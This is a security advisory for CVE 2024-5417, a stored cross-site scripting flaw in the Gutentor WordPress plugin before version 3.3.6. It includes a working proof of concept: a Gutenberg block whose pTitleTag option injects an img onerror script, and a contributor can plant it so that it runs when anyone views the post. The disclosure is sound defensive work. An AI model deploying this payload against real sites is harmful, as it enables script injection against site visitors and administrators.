Gutentor < 3.3.6 – Contributor+ Stored XSS | CVE 2024-5417

Description

The plugin does not validate and escape some of its block options before outputting them back in a page/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks

Proof of Concept

As a contributor, put the below code in a post while in code editor mode:

<!-- wp:gutentor/p3 {"gID":"gm704fd15","mPID":"25f55996-3ee4-4198-beb2-376e26177ed3"} -->\n<!-- wp:gutentor/p1 {"gID":"25f55996-3ee4-4198-beb2-376e26177ed3","pName":"gutentor/p1","p1CarouselOpt":{"enable":true,"carouselID":"gm704fd15","dots":false,"dotsT":false,"dotsM":false,"arrowNext":"fas fa-angle-right","arrowsPrev":"fas fa-angle-left","arrowsPosition":{"desktop":"gutentor-slick-a-default","tablet":"gutentor-slick-a-default","mobile":"gutentor-slick-a-default"},"arrows":true,"arrowsT":true,"arrowsM":true,"infinite":false,"speed":300,"autoplay":false,"draggable":true,"pauseOnFocus":true,"pauseOnHover":true,"autoplaySpeed":3000,"slideitem":{"desktop":"3","tablet":"3","mobile":"2"},"slidescroll":{"desktop":"3","tablet":"3","mobile":"2"},"cmondesktop":false,"cmpaddingdesktop":"","cmontablet":false,"cmpaddingtablet":"","cmonmobile":false,"cmpaddingmobile":""},"pBtnTypography":{"fontType":"default","desktopFontSize":16,"tabletFontSize":16,"mobileFontSize":16,"textTransform":"normal"},"q1BtnTypography":{"fontType":"default","desktopFontSize":16,"tabletFontSize":16,"mobileFontSize":16,"textTransform":"normal"},"pOnFeaturedCat":true,"pTitleTag":"img src=x onerror=alert(/XSS/)","pAvatarMargin":{"type":"px","mTop":"-45","mLeft":"20"}} /-->\n<!-- /wp:gutentor/p3 -->

The XSS will be triggered when any user will (pre)view the post